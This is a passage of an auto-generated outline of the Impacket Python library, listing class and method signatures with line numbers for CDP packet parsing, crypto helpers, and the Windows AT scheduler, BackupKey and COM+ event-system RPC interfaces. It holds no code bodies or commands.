method is_full_duplex (line 391) | def is_full_duplex(self):
class VLAN (line 394) | class VLAN(CDPElement):
method get_type (line 397) | def get_type(self):
method get_vlan_number (line 400) | def get_vlan_number(self):
class TrustBitmap (line 405) | class TrustBitmap(CDPElement):
method get_type (line 408) | def get_type(self):
method get_trust_bitmap (line 411) | def get_trust_bitmap(self):
method __str__ (line 414) | def __str__(self):
class UntrustedPortCoS (line 417) | class UntrustedPortCoS(CDPElement):
method get_type (line 420) | def get_type(self):
method get_port_CoS (line 423) | def get_port_CoS(self):
method __str__ (line 426) | def __str__(self):
class ManagementAddresses (line 429) | class ManagementAddresses(Address):
method get_type (line 432) | def get_type(self):
class MTU (line 435) | class MTU(CDPElement):
method get_type (line 438) | def get_type(self):
class SystemName (line 441) | class SystemName(CDPElement):
method get_type (line 444) | def get_type(self):
class SystemObjectId (line 447) | class SystemObjectId(CDPElement):
method get_type (line 450) | def get_type(self):
class SnmpLocation (line 453) | class SnmpLocation(CDPElement):
method get_type (line 456) | def get_type(self):
class DummyCdpElement (line 460) | class DummyCdpElement(CDPElement):
method get_type (line 463) | def get_type(self):
class CDPElementFactory (line 466) | class CDPElementFactory():
method create (line 490) | def create(cls, aBuffer):
FILE: impacket/crypto.py
function Generate_Subkey (line 38) | def Generate_Subkey(K):
function XOR_128 (line 88) | def XOR_128(N1,N2):
function PAD (line 96) | def PAD(N):
function AES_CMAC (line 100) | def AES_CMAC(K, M, length):
function AES_CMAC_PRF_128 (line 181) | def AES_CMAC_PRF_128(VK, M, VKlen, Mlen):
function KDF_CounterMode (line 213) | def KDF_CounterMode(KI, Label, Context, L):
class LSA_SECRET_XP (line 250) | class LSA_SECRET_XP(Structure):
function transformKey (line 259) | def transformKey(InputKey):
function decryptSecret (line 276) | def decryptSecret(key, value):
function encryptSecret (line 295) | def encryptSecret(key, value):
function SamDecryptNTLMHash (line 318) | def SamDecryptNTLMHash(encryptedHash, key):
function SamEncryptNTLMHash (line 336) | def SamEncryptNTLMHash(encryptedHash, key):
FILE: impacket/dcerpc/v5/atsvc.py
class DCERPCSessionError (line 35) | class DCERPCSessionError(DCERPCException):
method __init__ (line 36) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 39) | def __str__( self ):
class AT_INFO (line 77) | class AT_INFO(NDRSTRUCT):
class LPAT_INFO (line 86) | class LPAT_INFO(NDRPOINTER):
class AT_ENUM (line 92) | class AT_ENUM(NDRSTRUCT):
class AT_ENUM_ARRAY (line 102) | class AT_ENUM_ARRAY(NDRUniConformantArray):
class LPAT_ENUM_ARRAY (line 105) | class LPAT_ENUM_ARRAY(NDRPOINTER):
class AT_ENUM_CONTAINER (line 111) | class AT_ENUM_CONTAINER(NDRSTRUCT):
class NetrJobAdd (line 121) | class NetrJobAdd(NDRCALL):
class NetrJobAddResponse (line 128) | class NetrJobAddResponse(NDRCALL):
class NetrJobDel (line 135) | class NetrJobDel(NDRCALL):
class NetrJobDelResponse (line 143) | class NetrJobDelResponse(NDRCALL):
class NetrJobEnum (line 149) | class NetrJobEnum(NDRCALL):
class NetrJobEnumResponse (line 158) | class NetrJobEnumResponse(NDRCALL):
class NetrJobGetInfo (line 167) | class NetrJobGetInfo(NDRCALL):
class NetrJobGetInfoResponse (line 174) | class NetrJobGetInfoResponse(NDRCALL):
function hNetrJobAdd (line 193) | def hNetrJobAdd(dce, serverName = NULL, atInfo = NULL):
function hNetrJobDel (line 199) | def hNetrJobDel(dce, serverName = NULL, minJobId = 0, maxJobId = 0):
function hNetrJobEnum (line 206) | def hNetrJobEnum(dce, serverName = NULL, pEnumContainer = NULL, prefered...
function hNetrJobGetInfo (line 213) | def hNetrJobGetInfo(dce, serverName = NULL, jobId = 0):
FILE: impacket/dcerpc/v5/bkrp.py
class DCERPCSessionError (line 41) | class DCERPCSessionError(DCERPCException):
method __init__ (line 42) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 45) | def __str__( self ):
class BYTE_ARRAY (line 66) | class BYTE_ARRAY(NDRUniConformantArray):
class PBYTE_ARRAY (line 69) | class PBYTE_ARRAY(NDRPOINTER):
class Rc4EncryptedPayload (line 75) | class Rc4EncryptedPayload(Structure):
class WRAPPED_SECRET (line 84) | class WRAPPED_SECRET(Structure):
class BackuprKey (line 99) | class BackuprKey(NDRCALL):
class BackuprKeyResponse (line 108) | class BackuprKeyResponse(NDRCALL):
function hBackuprKey (line 125) | def hBackuprKey(dce, pguidActionAgent, pDataIn, dwParam=0):
FILE: impacket/dcerpc/v5/dcom/comev.py
class DCERPCSessionError (line 38) | class DCERPCSessionError(DCERPCException):
method __init__ (line 39) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 42) | def __str__( self ):
class VARENUM (line 74) | class VARENUM(NDRENUM):
class enumItems (line 75) | class enumItems(Enum):
class TYPEATTR (line 117) | class TYPEATTR(NDRSTRUCT):
class OBJECT_ARRAY (line 121) | class OBJECT_ARRAY(NDRUniConformantVaryingArray):
class IEventSystem_Query (line 129) | class IEventSystem_Query(DCOMCALL):
class IEventSystem_QueryResponse (line 136) | class IEventSystem_QueryResponse(DCOMANSWER):
class IEventSystem_Store (line 144) | class IEventSystem_Store(DCOMCALL):
class IEventSystem_StoreResponse (line 151) | class IEventSystem_StoreResponse(DCOMANSWER):
class IEventSystem_Remove (line 157) | class IEventSystem_Remove(DCOMCALL):
class IEventSystem_RemoveResponse (line 164) | class IEventSystem_RemoveResponse(DCOMANSWER):
class IEventSystem_get_EventObjectChangeEventClassID (line 171) | class IEventSystem_get_EventObjectChangeEventClassID(DCOMCALL):
class IEventSystem_get_EventObjectChangeEventClassIDResponse (line 176) | class IEventSystem_get_EventObjectChangeEventClassIDResponse(DCOMANSWER):
class IEventSystem_QueryS (line 183) | class IEventSystem_QueryS(DCOMCALL):
class IEventSystem_QuerySResponse (line 190) | class IEventSystem_QuerySResponse(DCOMANSWER):
class IEventSystem_RemoveS (line 197) | class IEventSystem_RemoveS(DCOMCALL):
class IEventSystem_RemoveSResponse (line 204) | class IEventSystem_RemoveSResponse(DCOMANSWER):
class IEventClass_get_EventClassID (line 212) | class IEventClass_get_EventClassID(DCOMCALL):
class IEventClass_get_EventClassIDResponse (line 217) | class IEventClass_get_EventClassIDResponse(DCOMANSWER):
class IEventClass_put_EventClassID (line 224) | class IEventClass_put_EventClassID(DCOMCALL):
class IEventClass_put_EventClassIDResponse (line 230) | class IEventClass_put_EventClassIDResponse(DCOMANSWER):
class IEventClass_get_EventClassName (line 236) | class IEventClass_get_EventClassName(DCOMCALL):
class IEventClass_get_EventClassNameResponse (line 241) | class IEventClass_get_EventClassNameResponse(DCOMANSWER):
class IEventClass_put_EventClassName (line 248) | class IEventClass_put_EventClassName(DCOMCALL):
class IEventClass_put_EventClassNameResponse (line 254) | class IEventClass_put_EventClassNameResponse(DCOMANSWER):
class IEventClass_get_OwnerSID (line 260) | class IEventClass_get_OwnerSID(DCOMCALL):
class IEventClass_get_OwnerSIDResponse (line 265) | class IEventClass_get_OwnerSIDResponse(DCOMANSWER):
class IEventClass_put_OwnerSID (line 272) | class IEventClass_put_OwnerSID(DCOMCALL):
class IEventClass_put_OwnerSIDResponse (line 278) | class IEventClass_put_OwnerSIDResponse(DCOMANSWER):
class IEventClass_get_FiringInterfaceID (line 284) | class IEventClass_get_FiringInterfaceID(DCOMCALL):
class IEventClass_get_FiringInterfaceIDResponse (line 289) | class IEventClass_get_FiringInterfaceIDResponse(DCOMANSWER):
class IEventClass_put_FiringInterfaceID (line 296) | class IEventClass_put_FiringInterfaceID(DCOMCALL):
class IEventClass_put_FiringInterfaceIDResponse (line 302) | class IEventClass_put_FiringInterfaceIDResponse(DCOMANSWER):
class IEventClass_get_Description (line 308) | class IEventClass_get_Description(DCOMCALL):
class IEventClass_get_DescriptionResponse (line 313) | class IEventClass_get_DescriptionResponse(DCOMANSWER):
class IEventClass_put_Description (line 320) | class IEventClass_put_Description(DCOMCALL):
class IEventClass_put_DescriptionResponse (line 326) | class IEventClass_put_DescriptionResponse(DCOMANSWER):
class IEventClass_get_TypeLib (line 332) | class IEventClass_get_TypeLib(DCOMCALL):
class IEventClass_get_TypeLibResponse (line 337) | class IEventClass_get_TypeLibResponse(DCOMANSWER):
class IEventClass_put_TypeLib (line 344) | class IEventClass_put_TypeLib(DCOMCALL):
class IEventClass_put_TypeLibResponse (line 350) | class IEventClass_put_TypeLibResponse(DCOMANSWER):
class IEventClass2_get_PublisherID (line 358) | class IEventClass2_get_PublisherID(DCOMCALL):
class IEventClass2_get_PublisherIDResponse (line 363) | class IEventClass2_get_PublisherIDResponse(DCOMANSWER):
class IEventClass2_put_PublisherID (line 370) | class IEventClass2_put_PublisherID(DCOMCALL):
class IEventClass2_put_PublisherIDResponse (line 376) | class IEventClass2_put_PublisherIDResponse(DCOMANSWER):
class IEventClass2_get_MultiInterfacePublisherFilterCLSID (line 382) | class IEventClass2_get_MultiInterfacePublisherFilterCLSID(DCOMCALL):
class IEventClass2_get_MultiInterfacePublisherFilterCLSIDResponse (line 387) | class IEventClass2_get_MultiInterfacePublisherFilterCLSIDResponse(DCOMAN...
class IEventClass2_put_MultiInterfacePublisherFilterCLSID (line 394) | class IEventClass2_put_MultiInterfacePublisherFilterCLSID(DCOMCALL):
class IEventClass2_put_MultiInterfacePublisherFilterCLSIDResponse (line 400) | class IEventClass2_put_MultiInterfacePublisherFilterCLSIDResponse(DCOMAN...
class IEventClass2_get_AllowInprocActivation (line 406) | class IEventClass2_get_AllowInprocActivation(DCOMCALL):
class IEventClass2_get_AllowInprocActivationResponse (line 411) | class IEventClass2_get_AllowInprocActivationResponse(DCOMANSWER):
class IEventClass2_put_AllowInprocActivation (line 418) | class IEventClass2_put_AllowInprocActivation(DCOMCALL):
class IEventClass2_put_AllowInprocActivationResponse (line 424) | class IEventClass2_put_AllowInprocActivationResponse(DCOMANSWER):
class IEventClass2_get_FireInParallel (line 430) | class IEventClass2_get_FireInParallel(DCOMCALL):
class IEventClass2_get_FireInParallelResponse (line 435) | class IEventClass2_get_FireInParallelResponse(DCOMANSWER):
class IEventClass2_put_FireInParallel (line 442) | class IEventClass2_put_FireInParallel(DCOMCALL):
class IEventClass2_put_FireInParallelResponse (line 448) | class IEventClass2_put_FireInParallelResponse(DCOMANSWER):
class IEventSubscription_get_SubscriptionID (line 456) | class IEventSubscription_get_SubscriptionID(DCOMCALL):
class IEventSubscription_get_SubscriptionIDResponse (line 461) | class IEventSubscription_get_SubscriptionIDResponse(DCOMANSWER):
class IEventSubscription_put_SubscriptionID (line 468) | class IEventSubscription_put_SubscriptionID(DCOMCALL):
class IEventSubscription_put_SubscriptionIDResponse (line 474) | class IEventSubscription_put_SubscriptionIDResponse(DCOMANSWER):
class IEventSubscription_get_SubscriptionName (line 480) | class IEventSubscription_get_SubscriptionName(DCOMCALL):
class IEventSubscription_get_SubscriptionNameResponse (line 485) | class IEventSubscription_get_SubscriptionNameResponse(DCOMANSWER):
class IEventSubscription_put_SubscriptionName (line 492) | class IEventSubscription_put_SubscriptionName(DCOMCALL):
class IEventSubscription_put_SubscriptionNameResponse (line 498) | class IEventSubscription_put_SubscriptionNameResponse(DCOMANSWER):
class IEventSubscription_get_PublisherID (line 504) | class IEventSubscription_get_PublisherID(DCOMCALL):
class IEventSubscription_get_PublisherIDResponse (line 509) | class IEventSubscription_get_PublisherIDResponse(DCOMANSWER):
class IEventSubscription_put_PublisherID (line 516) | class IEventSubscription_put_PublisherID(DCOMCALL):
class IEventSubscription_put_PublisherIDResponse (line 522) | class IEventSubscription_put_PublisherIDResponse(DCOMANSWER):
class IEventSubscription_get_EventClassID (line 528) | class IEventSubscription_get_EventClassID(DCOMCALL):
class IEventSubscription_get_EventClassIDResponse (line 533) | class IEventSubscription_get_EventClassIDResponse(DCOMANSWER):
class IEventSubscription_put_EventClassID (line 540) | class IEventSubscription_put_EventClassID(DCOMCALL):
class IEventSubscription_put_EventClassIDResponse (line 546) | class IEventSubscription_put_EventClassIDResponse(DCOMANSWER):
class IEventSubscription_get_MethodName (line 552) | class IEventSubscription_get_MethodName(DCOMCALL):
class IEventSubscription_get_MethodNameResponse (line 557) | class IEventSubscription_get_MethodNameResponse(DCOMANSWER):
class IEventSubscription_put_MethodName (line 564) | class IEventSubscription_put_MethodName(DCOMCALL):
class IEventSubscription_put_MethodNameResponse (line 570) | class IEventSubscription_put_MethodNameResponse(DCOMANSWER):
class IEventSubscription_get_SubscriberCLSID (line 576) | class IEventSubscription_get_SubscriberCLSID(DCOMCALL):
class IEventSubscription_get_SubscriberCLSIDResponse (line 581) | class IEventSubscription_get_SubscriberCLSIDResponse(DCOMANSWER):
class IEventSubscription_put_SubscriberCLSID (line 588) | class IEventSubscription_put_SubscriberCLSID(DCOMCALL):
class IEventSubscription_put_SubscriberCLSIDResponse (line 594) | class IEventSubscription_put_SubscriberCLSIDResponse(DCOMANSWER):
class IEventSubscription_get_SubscriberInterface (line 600) | class IEventSubscription_get_SubscriberInterface(DCOMCALL):
class IEventSubscription_get_SubscriberInterfaceResponse (line 605) | class IEventSubscription_get_SubscriberInterfaceResponse(DCOMANSWER):
class IEventSubscription_put_SubscriberInterface (line 612) | class IEventSubscription_put_SubscriberInterface(DCOMCALL):
class IEventSubscription_put_SubscriberInterfaceResponse (line 618) | class IEventSubscription_put_SubscriberInterfaceResponse(DCOMANSWER):
class IEventSubscription_get_PerUser (line 624) | class IEventSubscription_get_PerUser(DCOMCALL):
class IEventSubscription_get_PerUserResponse (line 629) | class IEventSubscription_get_PerUserResponse(DCOMANSWER):
class IEventSubscription_put_PerUser (line 636) | class IEventSubscription_put_PerUser(DCOMCALL):
class IEventSubscription_put_PerUserResponse (line 642) | class IEventSubscription_put_PerUserResponse(DCOMANSWER):
class IEventSubscription_get_OwnerSID (line 648) | class IEventSubscription_get_OwnerSID(DCOMCALL):
class IEventSubscription_get_OwnerSIDResponse (line 653) | class IEventSubscription_get_OwnerSIDResponse(DCOMANSWER):
class IEventSubscription_put_OwnerSID (line 660) | class IEventSubscription_put_OwnerSID(DCOMCALL):
class IEventSubscription_put_OwnerSIDResponse (line 666) | class IEventSubscription_put_OwnerSIDResponse(DCOMANSWER):
class IEventSubscription_get_Enabled (line 672) | class IEventSubscription_get_Enabled(DCOMCALL):
class IEventSubscription_get_EnabledResponse (line 677) | class IEventSubscription_get_EnabledResponse(DCOMANSWER):
class IEventSubscription_put_Enabled (line 684) | class IEventSubscription_put_Enabled(DCOMCALL):
class IEventSubscription_put_EnabledResponse (line 690) | class IEventSubscription_put_EnabledResponse(DCOMANSWER):
class IEventSubscription_get_Description (line 696) | class IEventSubscription_get_Description(DCOMCALL):
class IEventSubscription_get_DescriptionResponse (line 701) | class IEventSubscription_get_DescriptionResponse(DCOMANSWER):
class IEventSubscription_put_Description (line 708) | class IEventSubscription_put_Description(DCOMCALL):
class IEventSubscription_put_DescriptionResponse (line 714) | class IEventSubscription_put_DescriptionResponse(DCOMANSWER):
class IEventSubscription_get_MachineName (line 720) | class IEventSubscription_get_MachineName(DCOMCALL):
class IEventSubscription_get_MachineNameResponse (line 725) | class IEventSubscription_get_MachineNameResponse(DCOMANSWER):
class IEventSubscription_put_MachineName (line 732) | class IEventSubscription_put_MachineName(DCOMCALL):
class IEventSubscription_put_MachineNameResponse (line 738) | class IEventSubscription_put_MachineNameResponse(DCOMANSWER):
class IEventSubscription_GetPublisherProperty (line 744) | class IEventSubscription_GetPublisherProperty(DCOMCALL):
class IEventSubscription_GetPublisherPropertyResponse (line 750) | class IEventSubscription_GetPublisherPropertyResponse(DCOMANSWER):
class IEventSubscription_PutPublisherProperty (line 757) | class IEventSubscription_PutPublisherProperty(DCOMCALL):
class IEventSubscription_PutPublisherPropertyResponse (line 764) | class IEventSubscription_PutPublisherPropertyResponse(DCOMANSWER):
class IEventSubscription_RemovePublisherProperty (line 770) | class IEventSubscription_RemovePublisherProperty(DCOMCALL):
class IEventSubscription_RemovePublisherPropertyResponse (line 776) | class IEventSubscription_RemovePublisherPropertyResponse(DCOMANSWER):
class IEventSubscription_GetPublisherPropertyCollection (line 782) | class IEventSubscription_GetPublisherPropertyCollection(DCOMCALL):
class IEventSubscription_GetPublisherPropertyCollectionResponse (line 787) | class IEventSubscription_GetPublisherPropertyCollectionResponse(DCOMANSW...
class IEventSubscription_GetSubscriberProperty (line 794) | class IEventSubscription_GetSubscriberProperty(DCOMCALL):
class IEventSubscription_GetSubscriberPropertyResponse (line 800) | class IEventSubscription_GetSubscriberPropertyResponse(DCOMANSWER):
class IEventSubscription_PutSubscriberProperty (line 807) | class IEventSubscription_PutSubscriberProperty(DCOMCALL):
class IEventSubscription_PutSubscriberPropertyResponse (line 814) | class IEventSubscription_PutSubscriberPropertyResponse(DCOMANSWER):
class IEventSubscription_RemoveSubscriberProperty (line 820) | class IEventSubscription_RemoveSubscriberProperty(DCOMCALL):
class IEventSubscription_RemoveSubscriberPropertyResponse (line 826) | class IEventSubscription_RemoveSubscriberPropertyResponse(DCOMANSWER):
class IEventSubscription_GetSubscriberPropertyCollection (line 832) | class IEventSubscription_GetSubscriberPropertyCollection(DCOMCALL):
class IEventSubscription_GetSubscriberPropertyCollectionResponse (line 837) | class IEventSubscription_GetSubscriberPropertyCollectionResponse(DCOMANS...
class IEventSubscription_get_InterfaceID (line 844) | class IEventSubscription_get_InterfaceID(DCOMCALL):
class IEventSubscription_get_InterfaceIDResponse (line 849) | class IEventSubscription_get_InterfaceIDResponse(DCOMANSWER):
class IEventSubscription_put_InterfaceID (line 856) | class IEventSubscription_put_InterfaceID(DCOMCALL):
class IEventSubscription_put_InterfaceIDResponse (line 862) | class IEventSubscription_put_InterfaceIDResponse(DCOMANSWER):
class IEnumEventObject_Clone (line 870) | class IEnumEventObject_Clone(DCOMCALL):
class IEnumEventObject_CloneResponse (line 875) | class IEnumEventObject_CloneResponse(DCOMANSWER):
class IEnumEventObject_Next (line 882) | class IEnumEventObject_Next(DCOMCALL):
class IEnumEventObject_NextResponse (line 888) | class IEnumEventObject_NextResponse(DCOMANSWER):
class IEnumEventObject_Reset (line 896) | class IEnumEventObject_Reset(DCOMCALL):
class IEnumEventObject_ResetResponse (line 901) | class IEnumEventObject_ResetResponse(DCOMANSWER):
class IEnumEventObject_Skip (line 907) | class IEnumEventObject_Skip(DCOMCALL):
class IEnumEventObject_SkipResponse (line 913) | class IEnumEventObject_SkipResponse(DCOMANSWER):
class IEventObjectCollection_get__NewEnum (line 921) | class IEventObjectCollection_get__NewEnum(DCOMCALL):
class IEventObjectCollection_get__NewEnumResponse (line 926) | class IEventObjectCollection_get__NewEnumResponse(DCOMANSWER):
class IEventObjectCollection_get_Item (line 933) | class IEventObjectCollection_get_Item(DCOMCALL):
class IEventObjectCollection_get_ItemResponse (line 939) | class IEventObjectCollection_get_ItemResponse(DCOMANSWER):
class IEventObjectCollection_get_NewEnum (line 946) | class IEventObjectCollection_get_NewEnum(DCOMCALL):
class IEventObjectCollection_get_NewEnumResponse (line 951) | class IEventObjectCollection_get_NewEnumResponse(DCOMANSWER):
class IEventObjectCollection_get_Count (line 958) | class IEventObjectCollection_get_Count(DCOMCALL):
class IEventObjectCollection_get_CountResponse (line 963) | class IEventObjectCollection_get_CountResponse(DCOMANSWER):
class IEventObjectCollection_Add (line 970) | class IEventObjectCollection_Add(DCOMCALL):
class IEventObjectCollection_AddResponse (line 977) | class IEventObjectCollection_AddResponse(DCOMANSWER):
class IEventObjectCollection_Remove (line 983) | class IEventObjectCollection_Remove(DCOMCALL):
class IEventObjectCollection_RemoveResponse (line 989) | class IEventObjectCollection_RemoveResponse(DCOMANSWER):
class IEventClass3_get_EventClassPartitionID (line 997) | class IEventClass3_get_EventClassPartitionID(DCOMCALL):
class IEventClass3_get_EventClassPartitionIDResponse (line 1002) | class IEventClass3_get_EventClassPartitionIDResponse(DCOMANSWER):
class IEventClass3_put_EventClassPartitionID (line 1009) | class IEventClass3_put_EventClassPartitionID(DCOMCALL):
class IEventClass3_put_EventClassPartitionIDResponse (line 1015) | class IEventClass3_put_EventClassPartitionIDResponse(DCOMANSWER):
class IEventClass3_get_EventClassApplicationID (line 1021) | class IEventClass3_get_EventClassApplicationID(DCOMCALL):
class IEventClass3_get_EventClassApplicationIDResponse (line 1026) | class IEventClass3_get_EventClassApplicationIDResponse(DCOMANSWER):
class IEventClass3_put_EventClassApplicationID (line 1033) | class IEventClass3_put_EventClassApplicationID(DCOMCALL):
class IEventClass3_put_EventClassApplicationIDResponse (line 1039) | class IEventClass3_put_EventClassApplicationIDResponse(DCOMANSWER):
class IEventSubscription2_get_FilterCriteria (line 1047) | class IEventSubscription2_get_FilterCriteria(DCOMCALL):
class IEventSubscription2_get_FilterCriteriaResponse (line 1052) | class IEventSubscription2_get_FilterCriteriaResponse(DCOMANSWER):
class IEventSubscription2_put_FilterCriteria (line 1059) | class IEventSubscription2_put_FilterCriteria(DCOMCALL):
class IEventSubscription2_put_FilterCriteriaResponse (line 1065) | class IEventSubscription2_put_FilterCriteriaResponse(DCOMANSWER):
class IEventSubscription2_get_SubscriberMoniker (line 1071) | class IEventSubscription2_get_SubscriberMoniker(DCOMCALL):
class IEventSubscription2_get_SubscriberMonikerResponse (line 1076) | class IEventSubscription2_get_SubscriberMonikerResponse(DCOMANSWER):
class IEventSubscription2_put_SubscriberMoniker (line 1083) | class IEventSubscription2_put_SubscriberMoniker(DCOMCALL):
class IEventSubscription2_put_SubscriberMonikerResponse (line 1089) | class IEventSubscription2_put_SubscriberMonikerResponse(DCOMANSWER):
class IEventSubscription3_get_EventClassPartitionID (line 1097) | class IEventSubscription3_get_EventClassPartitionID(DCOMCALL):
class IEventSubscription3_get_EventClassPartitionIDResponse (line 1102) | class IEventSubscription3_get_EventClassPartitionIDResponse(DCOMANSWER):
class IEventSubscription3_put_EventClassPartitionID (line 1109) | class IEventSubscription3_put_EventClassPartitionID(DCOMCALL):
class IEventSubscription3_put_EventClassPartitionIDResponse (line 1115) | class IEventSubscription3_put_EventClassPartitionIDResponse(DCOMANSWER):
class IEventSubscription3_get_EventClassApplicationID (line 1121) | class IEventSubscription3_get_EventClassApplicationID(DCOMCALL):
class IEventSubscription3_get_EventClassApplicationIDResponse (line 1126) | class IEventSubscription3_get_EventClassApplicationIDResponse(DCOMANSWER):
class IEventSubscription3_put_EventClassApplicationID (line 1133) | class IEventSubscription3_put_EventClassApplicationID(DCOMCALL):
class IEventSubscription3_put_EventClassApplicationIDResponse (line 1139) | class IEventSubscription3_put_EventClassApplicationIDResponse(DCOMANSWER):
class IEventSubscription3_get_SubscriberPartitionID (line 1145) | class IEventSubscription3_get_SubscriberPartitionID(DCOMCALL):
class IEventSubscription3_get_SubscriberPartitionIDResponse (line 1150) | class IEventSubscription3_get_SubscriberPartitionIDResponse(DCOMANSWER):
class IEventSubscription3_put_SubscriberPartitionID (line 1157) | class IEventSubscription3_put_SubscriberPartitionID(DCOMCALL):
class IEventSubscription3_put_SubscriberPartitionIDResponse (line 1163) | class IEventSubscription3_put_SubscriberPartitionIDResponse(DCOMANSWER):
class IEventSubscription3_get_SubscriberApplicationID (line 1169) | class IEventSubscription3_get_SubscriberApplicationID(DCOMCALL):
class IEventSubscription3_get_SubscriberApplicationIDResponse (line 1174) | class IEventSubscription3_get_SubscriberApplicationIDResponse(DCOMANSWER):
class IEventSubscription3_put_SubscriberApplicationID (line 1181) | class IEventSubscription3_put_SubscriberApplicationID(DCOMCALL):
class IEventSubscription3_put_SubscriberApplicationIDResponse (line 1187) | class IEventSubscription3_put_SubscriberApplicationIDResponse(DCOMANSWER):
class IEventSystem2_GetVersion (line 1195) | class IEventSystem2_GetVersion(DCOMCALL):
class IEventSystem2_GetVersionResponse (line 1200) | class IEventSystem2_GetVersionResponse(DCOMANSWER):
class IEventSystem2_VerifyTransientSubscribers (line 1207) | class IEventSystem2_VerifyTransientSubscribers(DCOMCALL):
class IEventSystem2_VerifyTransientSubscribersResponse (line 1212) | class IEventSystem2_VerifyTransientSubscribersResponse(DCOMANSWER):
class IEventSystemInitialize_SetCOMCatalogBehaviour (line 1220) | class IEventSystemInitialize_SetCOMCatalogBehaviour(DCOMCALL):
class IEventSystemInitialize_SetCOMCatalogBehaviourResponse (line 1226) | class IEventSystemInitialize_SetCOMCatalogBehaviourResponse(DCOMANSWER):
class IEventClass (line 1241) | class IEventClass(IDispatch):
method __init__ (line 1242) | def __init__(self, interface):
method get_EventClassID (line 1246) | def get_EventClassID(self):
method put_EventClassID (line 1252) | def put_EventClassID(self,bstrEventClassID):
method get_EventClassName (line 1259) | def get_EventClassName(self):
method put_EventClassName (line 1265) | def put_EventClassName(self, bstrEventClassName):
method get_OwnerSID (line 1272) | def get_OwnerSID(self):
method put_OwnerSID (line 1278) | def put_OwnerSID(self, bstrOwnerSID):
method get_FiringInterfaceID (line 1285) | def get_FiringInterfaceID(self):
method put_FiringInterfaceID (line 1291) | def put_FiringInterfaceID(self, bstrFiringInterfaceID):
method get_Description (line 1298) | def get_Description(self):
method put_Description (line 1304) | def put_Description(self, bstrDescription):
method get_TypeLib (line 1311) | def get_TypeLib(self):
method put_TypeLib (line 1317) | def put_TypeLib(self, bstrTypeLib):
class IEventClass2 (line 1324) | class IEventClass2(IEventClass):
method __init__ (line 1325) | def __init__(self, interface):
method get_PublisherID (line 1329) | def get_PublisherID(self):
method put_PublisherID (line 1335) | def put_PublisherID(self, bstrPublisherID):
method get_MultiInterfacePublisherFilterCLSID (line 1342) | def get_MultiInterfacePublisherFilterCLSID(self):
method put_MultiInterfacePublisherFilterCLSID (line 1348) | def put_MultiInterfacePublisherFilterCLSID(self, bstrPubFilCLSID):
method get_AllowInprocActivation (line 1355) | def get_AllowInprocActivation(self):
method put_AllowInprocActivation (line 1361) | def put_AllowInprocActivation(self, fAllowInprocActivation):
method get_FireInParallel (line 1368) | def get_FireInParallel(self):
method put_FireInParallel (line 1374) | def put_FireInParallel(self, fFireInParallel):
class IEventClass3 (line 1381) | class IEventClass3(IEventClass2):
method __init__ (line 1382) | def __init__(self, interface):
method get_EventClassPartitionID (line 1386) | def get_EventClassPartitionID(self):
method put_EventClassPartitionID (line 1392) | def put_EventClassPartitionID(self, bstrEventClassPartitionID):
method get_EventClassApplicationID (line 1399) | def get_EventClassApplicationID(self):
method put_EventClassApplicationID (line 1405) | def put_EventClassApplicationID(self, bstrEventClassApplicationID):
class IEventSubscription (line 1412) | class IEventSubscription(IDispatch):
method __init__ (line 1413) | def __init__(self, interface):
method get_SubscriptionID (line 1417) | def get_SubscriptionID(self):
method put_SubscriptionID (line 1423) | def put_SubscriptionID(self, bstrSubscriptionID):
method get_SubscriptionName (line 1430) | def get_SubscriptionName(self):
method put_SubscriptionName (line 1435) | def put_SubscriptionName(self, bstrSubscriptionName):
method get_PublisherID (line 1442) | def get_PublisherID(self):
method put_PublisherID (line 1448) | def put_PublisherID(self, bstrPublisherID):
method get_EventClassID (line 1455) | def get_EventClassID(self):
method put_EventClassID (line 1461) | def put_EventClassID(self, pbstrEventClassID):
method get_MethodName (line 1468) | def get_MethodName(self):
method put_MethodName (line 1474) | def put_MethodName(self, bstrMethodName):
method get_SubscriberCLSID (line 1481) | def get_SubscriberCLSID(self):
method put_SubscriberCLSID (line 1487) | def put_SubscriberCLSID(self, bstrSubscriberCLSID):
method get_SubscriberInterface (line 1494) | def get_SubscriberInterface(self):
method put_SubscriberInterface (line 1500) | def put_SubscriberInterface(self, pSubscriberInterface):
method get_PerUser (line 1507) | def get_PerUser(self):
method put_PerUser (line 1513) | def put_PerUser(self, fPerUser):
method get_OwnerSID (line 1520) | def get_OwnerSID(self):
method put_OwnerSID (line 1526) | def put_OwnerSID(self, bstrOwnerSID):
method get_Enabled (line 1533) | def get_Enabled(self):
method put_Enabled (line 1539) | def put_Enabled(self, fEnabled):
method get_Description (line 1546) | def get_Description(self):
method put_Description (line 1552) | def put_Description(self, bstrDescription):
method get_MachineName (line 1559) | def get_MachineName(self):
method put_MachineName (line 1565) | def put_MachineName(self, bstrMachineName):
method GetPublisherProperty (line 1572) | def GetPublisherProperty(self):
method PutPublisherProperty (line 1578) | def PutPublisherProperty(self, bstrPropertyName, propertyValue):
method RemovePublisherProperty (line 1586) | def RemovePublisherProperty(self, bstrPropertyName):
method GetPublisherPropertyCollection (line 1593) | def GetPublisherPropertyCollection(self):
method GetSubscriberProperty (line 1599) | def GetSubscriberProperty(self):
method PutSubscriberProperty (line 1605) | def PutSubscriberProperty(self, bstrPropertyName, propertyValue):
method RemoveSubscriberProperty (line 1613) | def RemoveSubscriberProperty(self, bstrPropertyName):
method GetSubscriberPropertyCollection (line 1620) | def GetSubscriberPropertyCollection(self):
method get_InterfaceID (line 1626) | def get_InterfaceID(self):
method put_InterfaceID (line 1632) | def put_InterfaceID(self, bstrInterfaceID):
class IEventSubscription2 (line 1639) | class IEventSubscription2(IEventSubscription):
method __init__ (line 1640) | def __init__(self, interface):
method get_FilterCriteria (line 1644) | def get_FilterCriteria(self):
method put_FilterCriteria (line 1650) | def put_FilterCriteria(self, bstrFilterCriteria):
method get_SubscriberMoniker (line 1657) | def get_SubscriberMoniker (self):
method put_SubscriberMoniker (line 1663) | def put_SubscriberMoniker(self, bstrMoniker):
class IEventSubscription3 (line 1670) | class IEventSubscription3(IEventSubscription2):
method __init__ (line 1671) | def __init__(self, interface):
method get_EventClassPartitionID (line 1675) | def get_EventClassPartitionID(self):
method put_EventClassPartitionID (line 1681) | def put_EventClassPartitionID(self, bstrEventClassPartitionID):
method get_EventClassApplicationID (line 1688) | def get_EventClassApplicationID(self):
method put_EventClassApplicationID (line 1694) | def put_EventClassApplicationID(self, bstrEventClassApplicationID):
